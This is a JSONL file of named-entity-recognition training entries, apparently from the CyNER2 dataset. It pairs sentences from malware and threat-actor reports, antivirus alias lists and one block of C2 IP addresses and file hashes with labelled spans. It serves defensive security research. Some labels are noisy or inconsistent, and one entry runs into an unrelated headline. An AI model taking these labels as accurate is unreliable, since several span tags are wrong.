{"text": "A backdoor targetting Linux also known as: Backdoor.Linux.Tsunami.A Linux.Kaiten.B ELF_KAITEN.SMK Trojan.Tsunami.excyez Linux.BackDoor.Tsunami.123 ELF_KAITEN.SMK ELF/Backdoor.MRMO- LINUX/Tsunami.ojldj Trojan.Backdoor.Linux.Tsunami.1 Backdoor.Linux.Tsunami!c Linux.Backdoor.Tsunami.Wrpx", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001225", "source": "cyner2_train"}}
{"text": "August contains stealing functionality targeting credentials and sensitive documents from the infected computer.", "spans": {"MALWARE: August": [[0, 6]], "SYSTEM: infected computer.": [[94, 112]]}, "info": {"id": "cyner2_train_001228", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan/VB.htj Trojan.Heur.RX.ED14C7A Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win.Trojan.VB-8430 Trojan-Dropper.Win32.Daws.enmy Troj.Downloader.W32.VB.ldQ2 TrojWare.Win32.Trojan.VB.~DQ Trojan.VB.Win32.6994 BehavesLike.Win32.Trojan.nm Trojan.Win32.VB Trojan/VB.fgm Backdoor:Win32/Lordly.A Trojan-Dropper.Win32.Daws.enmy Trojan/Win32.Downloader.R12171 Trojan.VB!jnJsu+mHRvk W32/VB.JHO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001229", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Revetrat Trojan:MSIL/Starter.I Trj/GdSda.A Win32/Trojan.db5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001230", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Z.Pemalform.45056.A W32.W.Otwycal.l4av TrojanDownloader:Win32/Raemnk.A Win32/RiskWare.PEMalform.E Win32/Trojan.444", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001231", "source": "cyner2_train"}}
{"text": "The targets were then further narrowed to those that were running the Mac OS X operating system, had not previously visited the website, and had specific browser versions.", "spans": {"SYSTEM: the Mac OS X operating system,": [[66, 96]], "SYSTEM: browser versions.": [[154, 171]]}, "info": {"id": "cyner2_train_001233", "source": "cyner2_train"}}
{"text": "Ginp embeds the following set of features , allowing it to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( local overlays obtained from the C2 ) SMS harvesting : SMS listing SMS harvesting : SMS forwarding Contact list collection Application listing Overlaying : Targets list update SMS : Sending Calls : Call forwarding C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Update 10/03/2020 At the end of February the actors behind Ginp added screen capture capabilities to their Trojan .", "spans": {"MALWARE: Ginp": [[0, 4], [560, 564]]}, "info": {"id": "cyner2_train_001237", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Grozlex.A3 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_GROZLEX.SMA Win.Spyware.Grozlex-1 TSPY_GROZLEX.SMA PWS:MSIL/Mintluks.A Trojan.PasswordStealer.MSIL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001238", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ArtemisPuty.Trojan Trojan.Modputty.A5 Trojan.Puty.Win32.1 Trojan/MalPutty.a W32/Trojan.SHOY-1500 Win.Trojan.Stealzilla-1 Trojan-PSW.Win32.Puty.a Trojan.Win32.Puty.dsnaim Troj.PSW32.W.Puty.tnaX Win32.Trojan-qqpass.Qqrob.Llhf BackDoor.DaVinci.18 BehavesLike.Win32.BadFile.hh Trojan.Win32.Modputty Trojan/PSW.Puty.a Trojan:Win32/Modputty.A Trojan-PSW.Win32.Puty.a Trojan/Win32.Modputty.C862836 TrojanPSW.Puty Trojan.PWS.Puty! W32/MalPutty.A!tr Trj/Fakeputty.A Win32/Trojan.Spy.b9b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001240", "source": "cyner2_train"}}
{"text": "We have analyzed the samples to determine the author's ultimate goal and have named this malware KeyRaider", "spans": {"THREAT_ACTOR: author's": [[46, 54]], "MALWARE: malware KeyRaider": [[89, 106]]}, "info": {"id": "cyner2_train_001242", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VBS/Downldr.HM VBS.Downloader.B VBS_LOCKY.DLDSARF Win.Trojan.Locky-6360731-0 Trojan.Script.ExpKit.etmlqw Troj.Downloader.Script!c VBS.DownLoader.1006 VBS_LOCKY.DLDSARF VBS/Downldr.HM Trojan/VBS.downloder TrojanDownloader:VBS/Locky.A VBS/Obfus.S8 Trojan-Ransom.Script.Locky virus.vbs.qexvmc.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001243", "source": "cyner2_train"}}
{"text": "It uses insidious injection and other sophisticated and stealthy methods.", "spans": {}, "info": {"id": "cyner2_train_001245", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Sasser.D Win32.Trojan.WisdomEyes.16070401.9500.9679 W32.Sasser.D Win32/Sasser.D Win.Worm.Sasser-2 Net-Worm.Win32.Sasser.c Trojan.Win32.Sasser.fvek Worm.Win32.Sasser.16384 W32.W.Sasser.kZ72 W32/Sasser.worm.d I-Worm/Sasser.d WORM/Sasser.D Worm[Net]/Win32.Sasser Net-Worm.Win32.Sasser.c Worm:Win32/Sasser.dam W32/Sasser.worm.d Worm.Sasser W32/Sasser.D.worm Email-Worm.Win32.Plexus W32/Sasser.C!worm.im", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001246", "source": "cyner2_train"}}
{"text": "Full remote access capabilities is a dream tool for the black hat community, and are highly sought after.", "spans": {"MALWARE: remote access": [[5, 18]], "MALWARE: tool": [[43, 47]], "THREAT_ACTOR: black hat community,": [[56, 76]]}, "info": {"id": "cyner2_train_001247", "source": "cyner2_train"}}
{"text": "The purpose of using such a design is likely to make understanding and analyzing the malware's code flow more difficult for researchers.", "spans": {"ORGANIZATION: researchers.": [[124, 136]]}, "info": {"id": "cyner2_train_001248", "source": "cyner2_train"}}
{"text": "Recently, I've been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear.", "spans": {"MALWARE: malware": [[34, 41]], "SYSTEM: PowerShell": [[52, 62]], "MALWARE: variants": [[138, 146]]}, "info": {"id": "cyner2_train_001250", "source": "cyner2_train"}}
{"text": "As proof of its popularity, certain government officials are said to employ this application for communication purposes in the office.", "spans": {}, "info": {"id": "cyner2_train_001252", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Turla.ar Trojan.Asprox.B Trojan.MulDrop7.18901 BehavesLike.Win32.Downloader.dc Trojan:Win32/Regin.D!dha Trj/Chgt.J Win32/Turla.AR Trojan.Turla!gdUjdZ2fM5A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001253", "source": "cyner2_train"}}
{"text": "Now, three months after the source code was published, we decided to have a look at what has changed in the banking malware landscape.", "spans": {"MALWARE: the banking malware": [[104, 123]]}, "info": {"id": "cyner2_train_001254", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt.RI Trojan.Crypt Trojan.Crypt.RI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001255", "source": "cyner2_train"}}
{"text": "Sysget malware was delivered both directly via phishing emails, as well as in Rich Text Format RTF documents exploiting the CVE-2015-1641 vulnerability patched in MS15-033 that in turn leveraged a very unique shellcode.", "spans": {"MALWARE: Sysget malware": [[0, 14]], "VULNERABILITY: exploiting": [[109, 119]], "VULNERABILITY: vulnerability": [[138, 151]]}, "info": {"id": "cyner2_train_001258", "source": "cyner2_train"}}
{"text": "Indicators about Sakula and multiple RATs that are being used across multiple intrusions.", "spans": {"MALWARE: Sakula": [[17, 23]], "MALWARE: multiple RATs": [[28, 41]]}, "info": {"id": "cyner2_train_001260", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Tofsee.B Trojan-Proxy.Win32.Xorpix.m Trojan.Win32.Xorpix.zybt Trojan.Win32.Proxy.12800.C Trojan.DownLoader.19108 Trojan.Small.Win32.39831 TrojanProxy.Xorpix.k Troj.Proxy.W32!c Trojan-Proxy.Win32.Xorpix.m Trojan/Win32.Xorpix.R72000 Win32/Small.NCN Win32.Trojan-proxy.Xorpix.Amci Trojan.Win32.Small Bck/Xorpix.AG Win32/Trojan.Proxy.211", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001261", "source": "cyner2_train"}}
{"text": "Mobile monetization platforms create software libraries that authors can embed into their apps to start earning money quickly.", "spans": {"ORGANIZATION: Mobile monetization platforms": [[0, 29]], "SYSTEM: software libraries": [[37, 55]], "THREAT_ACTOR: authors": [[61, 68]], "SYSTEM: apps": [[90, 94]]}, "info": {"id": "cyner2_train_001262", "source": "cyner2_train"}}
{"text": "It required other means to be deployed on targeted organizations' networks and is configured with previously stolen credentials.", "spans": {}, "info": {"id": "cyner2_train_001264", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Heur.Corrupt.PE TrojanDownloader:Win32/WarezSet.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001267", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.KloggerQKA.Trojan Trojan-Downloader.Win32.Delf!O Backdoor.Gobot Downloader.Delf.Win32.70 Backdoor.W32.Gobot.lfDt Trojan/Downloader.Delf.bm Win32.Trojan.WisdomEyes.16070401.9500.9965 W32/Avokado.SIKN-9031 W32.Gobot.A Backdoor.Gobot Win32/Gobot.B WORM_GOBOT.G Win.Downloader.Delf-144 Trojan.Win32.Delf.gvzc Trojan.Win32.Delf.47087 Win32.HLLW.Ghostbot WORM_GOBOT.G BehavesLike.Win32.Kudj.pc Backdoor.Win32.Gobot W32/Avokado.B@bd TrojanDownloader.Delf.pgr TR/Dldr.Delf.BM Trojan[Backdoor]/Win32.Gobot Backdoor:Win32/Gobot.A Worm/Win32.IRCBot.R29095 Bck/Gotob.AA Trojan.Delf.BM Win32/TrojanDownloader.Delf.BM Trojan.DL.Delf!UOW7nlBxiow", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001268", "source": "cyner2_train"}}
{"text": "In recent weeks, Unit 42 has discovered three documents crafted to exploit the InPage program.", "spans": {"ORGANIZATION: Unit 42": [[17, 24]], "MALWARE: exploit": [[67, 74]], "SYSTEM: InPage program.": [[79, 94]]}, "info": {"id": "cyner2_train_001271", "source": "cyner2_train"}}
{"text": "The malware families identified at this time are DarkComet, LuminosityLink RAT, Pony, ImmenentMonitor, and some multiple variations of shellcode.", "spans": {"MALWARE: The malware families": [[0, 20]], "MALWARE: DarkComet, LuminosityLink RAT, Pony, ImmenentMonitor,": [[49, 102]], "MALWARE: variations of shellcode.": [[121, 145]]}, "info": {"id": "cyner2_train_001272", "source": "cyner2_train"}}
{"text": "Despite the 2016 Olympics coming to a close, cybercriminals remain relentless in using the sporting event as a social engineering hook to distribute a banking Trojan.", "spans": {"ORGANIZATION: Olympics": [[17, 25]], "THREAT_ACTOR: cybercriminals": [[45, 59]], "MALWARE: banking Trojan.": [[151, 166]]}, "info": {"id": "cyner2_train_001274", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Program.Optimizer.12 TrojanDownloader:Win32/Javsisxep.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001275", "source": "cyner2_train"}}
{"text": "Of note, this is three years earlier than the oldest Elise sample we have found, suggesting this group has been active longer than previously documented.", "spans": {"MALWARE: Elise": [[53, 58]], "THREAT_ACTOR: group": [[97, 102]]}, "info": {"id": "cyner2_train_001280", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TSPY_KILLAV_BK2200FA.TOMC Trojan.Win32.NtRootKit.dgaent Troj.GameThief.W32.OnLineGames.l7iy Trojan.DownLoad3.35430 Trojan.KillAV.Win32.9854 TSPY_KILLAV_BK2200FA.TOMC TR/Killav.OI.2 Trojan/Win32.Unknown Trojan.Graftor.D3B65 Trojan:WinNT/Killav.E Trojan/Win32.KillAV.R32978 Trojan.Win32.KillAV.aal W32/KillAV.NKC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001281", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrjnDwnldr.Banload.FC.2467 Win32.Trojan.WisdomEyes.16070401.9500.9993 W32/Trojan.FOJF-1615 Ransom_Blocker.R004C0DAM18 Win.Trojan.12504345-1 Trojan-Ransom.Win32.Blocker.kqil Troj.Ransom.W32.Blocker!c Trojan.DownLoader13.59179 Ransom_Blocker.R004C0DAM18 Trojan/Blocker.kir TR/Spy.Banker.37888.6 Trojan[Ransom]/Win32.Blocker Trojan.Kazy.D81FF3 Trojan-Ransom.Win32.Blocker.kqil TrojanSpy:MSIL/Banker.M Trojan/Win32.MDA.C931868 Hoax.Blocker Trojan.Banker.WHS Win32.Trojan.Blocker.Pgmu Trojan.Blocker!RxWDop6Ua70 Trojan.MSIL.PSW Win32/Trojan.Spy.d2d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001283", "source": "cyner2_train"}}
{"text": "Through this entry, in which we take a closer look at an individual who we believe might be connected to the Winnti group, we hope to give both ordinary users and organizations better insights into some of the tools – notably the server infrastructures- these kinds of threat actors use, as well as the scale in which they operate.", "spans": {"ORGANIZATION: individual": [[57, 67]], "THREAT_ACTOR: the Winnti group,": [[105, 122]], "ORGANIZATION: ordinary users": [[144, 158]], "ORGANIZATION: organizations": [[163, 176]], "MALWARE: tools": [[210, 215]], "SYSTEM: the server infrastructures-": [[226, 253]], "THREAT_ACTOR: threat actors": [[269, 282]]}, "info": {"id": "cyner2_train_001285", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Dinwod!O W32.Virut.Cur1 W32.Virut.CF Win32/Virut.17408!corrupt WORM_OTORUN.SMN1 Trojan-Dropper.Win32.Dinwod.by Trojan.Win32.Dinwod.cooobe Troj.Dropper.W32.Dinwod.mmkC Virus.Win32.Virut.ua Virus.Win32.Virut.CE Trojan.MulDrop3.51046 WORM_OTORUN.SMN1 Win32/Virut.bv TR/VB.Inject.qopannv Trojan[Dropper]/Win32.Dinwod Win32.Virut.cr.61440 Trojan.Zusy.D423D8 Dropper.Dinwod.151552 Trojan-Dropper.Win32.Dinwod.by Worm:Win32/Rortoti.A HEUR/Fakon.mwf TScope.Trojan.VB Trojan.FileLock I-Worm.Filecoder.A Win32/Virut.NBP Trojan-Dropper.Win32.Dinwod W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001288", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ursu.D1347A Win32.Trojan.WisdomEyes.16070401.9500.9990 Trojan.MulDrop7.48244 Trojan-Ransom.Rantest W32.Ransomsimulation TR/StartPage.wgude Trojan/MSIL.Miner RiskWare.RansomSimulator Trj/GdSda.A Trojan.StartPage!pRfC+LclTxM Win32/Trojan.7c5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001289", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.WebSearch W32/Application.KWFL-8070 Trojan.Win32.WebSearch.ak Trojan.Win32.WebSearch.ommdf Trojan.Win32.Z.Websearch.263168 Troj.W32.Websearch!c TR/WebSearch.V Trojan:Win32/WebSearch.F Trojan.Win32.WebSearch.ak Trj/CI.A Win32.Trojan.Websearch.Lmap Trojan.WebSearch!GWyPJuQViZY Win32/Trojan.3ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001290", "source": "cyner2_train"}}
{"text": "Locky is a ransomware that can be installed when you open an attachment, usually as a Word file from a spam email.", "spans": {"MALWARE: Locky": [[0, 5]], "MALWARE: ransomware": [[11, 21]]}, "info": {"id": "cyner2_train_001291", "source": "cyner2_train"}}
{"text": "We are seeing a bit of an uptick of emails containing java adwind or Java Jacksbot attachments.", "spans": {"MALWARE: adwind": [[59, 65]], "MALWARE: Jacksbot": [[74, 82]]}, "info": {"id": "cyner2_train_001292", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Dropper.ANAB TROJ_DROPPER.SMW Packed.Win32.Krap.ap Trojan.Winlock.587 TROJ_DROPPER.SMW BehavesLike.Win32.FakeAlertSecurityTool.fc W32/Risk.VFHY-0574 Trojan[Packed]/Win32.Krap Packed.Win32.Krap.ap Dropper/Win32.Smiscer.R13962 Trojan.DR.Procesemes!WkidsgpO+Do Packed.Win32.Krap", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001294", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.BitCoinMiner.jz Trojan.Win32.BitCoinMiner.euxcee Win32.Trojan.Bitcoinminer.Wrgk Trojan.DownLoader25.54215 Trojan.CoinMiner.Win32.6503 Trojan/Win32.BitCoinMiner Trojan.Win32.BitCoinMiner.jz TrojanDownloader:MSIL/CoinMiner.A!bit Trojan.BitCoinMiner Trojan.BitCoinMiner Trj/GdSda.A Trojan.BitCoinMiner!x6PcA/gbW/U W32/BitCoinMiner.JZ!tr Win32/Trojan.5d5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001295", "source": "cyner2_train"}}
{"text": "A few weeks ago, we observed new activity from ChessMaster, with notable evolutions in terms of new tools and tactics that weren't present in the initial attacks.", "spans": {"MALWARE: ChessMaster,": [[47, 59]], "MALWARE: tools": [[100, 105]]}, "info": {"id": "cyner2_train_001296", "source": "cyner2_train"}}
{"text": "It abuses the legitimate and popular open source framework DroidPlugin which allows an app to dynamically launch any apps as plugins without installing them in the system.", "spans": {"VULNERABILITY: abuses": [[3, 9]], "VULNERABILITY: open source framework DroidPlugin": [[37, 70]], "VULNERABILITY: allows an app to dynamically launch any apps as plugins": [[77, 132]], "SYSTEM: system.": [[164, 171]]}, "info": {"id": "cyner2_train_001297", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.StartPage.e.Trojan Trojan.Startpage TROJ_STARTPAGE_FD050152.UVPM Trojan.Win32.Z.Startpage.4001399 TROJ_STARTPAGE_FD050152.UVPM TR/StartPage.sdjtv W32/STARTPAGE_FD050152.UVPM!tr Win32/Trojan.41b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001298", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB Trojan/VB.bmd Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.ZJNQ-3376 TROJ_VB.FVH Win.Trojan.VB-3241 Trojan.Win32.VB.bmd Trojan.Win32.VB.crkyqv Troj.W32.Vb!c Trojan.Win32.VB.aae Trojan.SimSun Trojan.VB.Win32.1599 TROJ_VB.FVH BehavesLike.Win32.PJTbinder.qz Trojan.Win32.Elkmil W32/Trojan2.YLV W32/VB.QRB!tr Trojan/Win32.VB Win32.Troj.VB.kcloud Trojan.Heur.E1F0CA Trojan.Win32.VB.28672.K Trojan.Win32.VB.bmd Trojan/Win32.Xema.R125410 TScope.Trojan.VB Trj/QQPass.AWP Virus.Win32.HideDoc.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001302", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.PPdoor.159232 Backdoor.Win32.PPdoor!O Win32.Trojan.WisdomEyes.16070401.9500.9989 Backdoor.Trojan BKDR_PPDOOR.AL Win.Trojan.PPDoor-3 Backdoor.Win32.PPdoor.bo Trojan.Win32.PPdoor.qstx Backdoor.Win32.PPdoor.A BackDoor.Srvlite BKDR_PPDOOR.AL BehavesLike.Win32.Pykse.ch W32/PPdoor.GR Backdoor/PPdoor.bo DR/Pere.103936.E.2 Trojan[Backdoor]/Win32.PPdoor Backdoor:Win32/Ppdoor.AJ Backdoor.Win32.PPdoor.bo Trojan/Win32.Ppdoor.C139757 Virus.Win32.Bayan-based Backdoor.PPdoor!lYc+pVWanGQ Backdoor.Win32.PPdoor Trj/PPDoor.FD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001304", "source": "cyner2_train"}}
{"text": "Check Point Mobile Threat Prevention has detected a new, unknown mobile malware that targeted two customer Android devices belonging to employees at a large financial services institution.", "spans": {"ORGANIZATION: Check Point Mobile Threat Prevention": [[0, 36]], "MALWARE: unknown": [[57, 64]], "SYSTEM: Android devices": [[107, 122]], "ORGANIZATION: employees": [[136, 145]], "ORGANIZATION: large financial services institution.": [[151, 188]]}, "info": {"id": "cyner2_train_001305", "source": "cyner2_train"}}
{"text": "FireEye recommends that Microsoft Office users apply the patch from Microsoft.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "SYSTEM: Microsoft Office": [[24, 40]], "ORGANIZATION: Microsoft.": [[68, 78]]}, "info": {"id": "cyner2_train_001307", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hacktool.Flystudio.16558 TSPY_AKSULA_CA083865.TOMC Win32.Trojan-PSW.Alipay.a TSPY_AKSULA_CA083865.TOMC Trojan-PSW.Win32.Alipay.peq Troj.Downloader.W32.BaiDload.lhQG TR/Aksula.jqeqy Trojan:Win32/Aksula.A Trojan.Mikey.D906C Trojan-PSW.Win32.Alipay.peq Trojan/Win32.Aksula.R27086 Win32.Trojan-qqpass.Qqrob.Phqe", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001309", "source": "cyner2_train"}}
{"text": "IOCs C & C IP addresses : 155.133.82.181 155.133.82.240 155.133.82.244 185.234.218.59 195.22.126.160 195.22.126.163 195.22.126.80 195.22.126.81 5.45.73.24 5.45.74.130 IP addresses from which the Trojan was downloaded : 185.174.173.31 185.234.218.59 188.166.156.110 195.22.126.160 195.22.126.80 195.22.126.81 195.22.126.82 195.22.126.83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8 c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c 31edacd064debdae892ab0bc788091c58a03808997e11b6c46a6a5de493ed25d 87ffec0fe0e7a83e6433694d7f24cfde2f70fc45800aa2acb8e816ceba428951 eabc604fe6b5943187c12b8635755c303c450f718cc0c8e561df22a27264f101 Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker May 12 , 2016 Mohit Kumar How to Hack an Android device ? It is possibly one of the most frequently asked questions on the Internet .", "spans": {"SYSTEM: ARM": [[1120, 1123]], "SYSTEM: Android": [[1171, 1178]]}, "info": {"id": "cyner2_train_001310", "source": "cyner2_train"}}
{"text": "All born in the 90s, these neophytes are not afraid to get caught, carelessly leaving a trail of traceable contact details online.", "spans": {"THREAT_ACTOR: neophytes": [[27, 36]]}, "info": {"id": "cyner2_train_001311", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DefayliLTO.Trojan Trojan.Win32.Cosmu!O Trojan.Hosts Trojan.Cosmu.Win32.8116 Win32.Trojan.Qhost.y W32/Trojan2.OIIF Trojan.Qhosts TROJ_COSMU_000001b.TOMA Win.Trojan.Cosmu-1352 Trojan.Win32.Hosts2.wog Trojan.Win32.Drop.rqzxb Troj.W32.Hosts2.toz0 Virus.Win32.Virut.ua TrojWare.Win32.Qhost.rqj Trojan.MulDrop3.7647 TROJ_COSMU_000001b.TOMA BehavesLike.Win32.PUPXAN.tz W32/Trojan.VWTG-6346 Win32/Virut.bv TR/Cosmu.oiqea Trojan/Win32.Cosmu Worm:Win32/Makc.A Trojan.Graftor.D2333 Trojan.Win32.A.Cosmu.577633 Trojan.Win32.Hosts2.wog HEUR/Fakon.mwf BScope.Trojan.IRCbot Win32/Qhost.ONX Trojan.Cosmu!mnslE6bxKwc Worm.Win32.AutoIt W32/Qhost.ONX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001313", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Gezak Trojan.Vir.HLL Trojan.Heur.ED5CCE WORM_GEZAK.A W32/Risk.GNIP-0600 W32.Osapex Win32/Gezak.A WORM_GEZAK.A Win.Trojan.Gezak-1 Virus.Win32.HLLW.Gezak Virus.Win32.HLLW.gjmh W32.HLLW.Gezak!c Win32.HLLW.Gezak Win32.HLLW.Osapex Virus.Gezak.Win32.1 W32/Osapex.b.worm Win32/HLLW.Gezak Virus/Win32.Gezak Win32.HLLW.kcloud Virus.Win32.HLLW.Gezak Win32/Osapex.worm.31744 W32/Osapex.b.worm Trojan.Worm Univ.AP.K Win32/HLLW.Gezak Win32.Virus.Hllw.Hnbi Win32.HLLW.Gezak Virus.Win32.HLLW W32/Gezak.A!worm Win32/Worm.fc8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001315", "source": "cyner2_train"}}
{"text": "Some examples are email messages claiming to be in regards to an overdue bill or invoice, utilizing such terminology in the subject line and given file name, such as invoice.zip or payment_doc_298427.zip", "spans": {}, "info": {"id": "cyner2_train_001316", "source": "cyner2_train"}}
{"text": "We haven't seen Locky for a long time, so I was quite surprised to see this one.", "spans": {}, "info": {"id": "cyner2_train_001319", "source": "cyner2_train"}}
{"text": "WHO IS BEHIND FAKESPY ’ S SMISHING CAMPAIGNS ? The Cybereason Nocturnus team suspects that the malware operators and authors are Chinese speakers .", "spans": {"MALWARE: FAKESPY": [[14, 21]], "ORGANIZATION: Cybereason Nocturnus": [[51, 71]]}, "info": {"id": "cyner2_train_001321", "source": "cyner2_train"}}
{"text": "It was hosting an Adobe Flash exploit targeting one of the newly disclosed vulnerabilities from the Hacking Team data breach, CVE-2015-5122.", "spans": {"SYSTEM: Adobe Flash": [[18, 29]], "MALWARE: exploit": [[30, 37]], "VULNERABILITY: vulnerabilities": [[75, 90]], "ORGANIZATION: Hacking Team": [[100, 112]]}, "info": {"id": "cyner2_train_001322", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.14848.GD Trojan.Win32.Small!O Trojan/Small.cnp Trojan.Conjar.8 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Ransomlock TROJ_IKYTOK.SMI Trojan.Win32.Small.djdxj TROJ_IKYTOK.SMI Trojan/Small.kgz TR/Zapchast.I Trojan:Win32/Ikytoky.A Trojan.Win32.A.Small.14848 Trojan/Win32.Menti.R9065 Trojan.Karagany Trojan.Downloader.MB Trj/Hexas.HEU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001324", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Injector.dtxv TROJ_INJECTOR_HA010038.UVPM Win32.Trojan-PSW.Fareit.a W32/Injector.GBX TROJ_INJECTOR_HA010038.UVPM Win.Trojan.Fareit-403 Riskware.Win32.Stealer.evlqpt Trojan.PWS.Stealer.18592 Trojan.Ekstak.Win32.3539 W32/Injector.ELVO-4299 DR/Delphi.rghyi Trojan/Win32.Ekstak.R214290 Backdoor.Androm Trojan.Injector Win32/PSW.Fareit.A Trojan.Win32.Injector W32/Kryptik.GCFM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001325", "source": "cyner2_train"}}
{"text": "Many domains in this report are compromised domains - traffic to them may not be malicious.", "spans": {}, "info": {"id": "cyner2_train_001327", "source": "cyner2_train"}}
{"text": "Analysis of TG-3390's operations, targeting, and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China.", "spans": {"THREAT_ACTOR: TG-3390's operations,": [[12, 33]], "MALWARE: tools": [[49, 54]], "ORGANIZATION: CTU": [[59, 62]]}, "info": {"id": "cyner2_train_001331", "source": "cyner2_train"}}
{"text": "In January 2016 Forcepoint Security Labs reported an email campaign delivering the Ursnif banking Trojan which used the Range' feature within its initial HTTP requests to avoid detection.", "spans": {"ORGANIZATION: Forcepoint Security Labs": [[16, 40]], "THREAT_ACTOR: email campaign": [[53, 67]], "MALWARE: Ursnif banking Trojan": [[83, 104]]}, "info": {"id": "cyner2_train_001332", "source": "cyner2_train"}}
{"text": "The Lazarus group, which has been identified as the backbone of the report, has been active in the past, and Novetta's research is helping to preemptively counteract and prevent Lazarus attacks around the world.", "spans": {"THREAT_ACTOR: The Lazarus group,": [[0, 18]], "ORGANIZATION: Novetta's research": [[109, 127]], "THREAT_ACTOR: Lazarus": [[178, 185]]}, "info": {"id": "cyner2_train_001333", "source": "cyner2_train"}}
{"text": "While vertical targeting varies, we observed a significant focus on Financial Services.", "spans": {"ORGANIZATION: Financial Services.": [[68, 87]]}, "info": {"id": "cyner2_train_001334", "source": "cyner2_train"}}
